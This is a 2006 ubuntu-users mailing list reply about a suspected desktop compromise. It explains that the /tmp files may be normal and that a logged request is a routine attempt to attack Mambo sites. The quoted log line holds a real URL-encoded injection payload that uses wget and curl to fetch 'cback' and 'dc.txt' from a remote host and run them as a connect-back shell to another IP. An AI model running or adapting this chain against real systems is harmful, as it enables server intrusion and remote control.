My home desktop was compromised, but how?
Dennis Kaarsemaker
dennis at kaarsemaker.net
Tue Feb 28 21:44:23 UTC 2006
On di, 2006-02-28 at 15:44 -0500, Carthik Sharma wrote:
> Somebody seems to have hacked into my desktop/server. I find files in
> the /tmp/ (like "agent.8213)directory which I cannot open, these are
> setuid-ed -- how do I open these?
These may vere well be normal, many applications place thing in /tmp.
Try sudo ls /tmp/agent.8213 to see the contents
> In my apache access logs, there are things like
> "http://66.98.144.89/cmd.txt?&cmd=cd%20/tmp;wget%
> 20216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%
> 208081;wget%20216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt
> %20217.160.242.90%208081;cd%20/var/tmp;curl%20-o%20cback%
> 20http://216.99.218.183/cback;chmod%20744%20cback;./cback%
> 20217.160.242.90%208081;curl%20-o%20dc.txt%
> 20http://216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%
> 20217.160.242.90%208081;echo%20YYY;echo|"
>
> That above is a valid url, and will take you to a script to deface
> someone's php script etc, I suppose. Now, how did this malicious
> hacker get in my computer?
That is just an attempt to deface a mambo site. If you don't use mambo:
don't worry (anyone can request any weird looking url on your server,
and it'll end up in your log). If you do run mambo: make sure you're up
to date.
--
Dennis K.
- Linux for human beings - http://www.ubuntu.com
- Linux voor normale mensen - htp://www.ubuntu-nl.org
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 191 bytes
Desc: This is a digitally signed message part
URL: <https://lists.ubuntu.com/archives/ubuntu-users/attachments/20060228/af7f4941/attachment.sig>
More information about the ubuntu-users
mailing list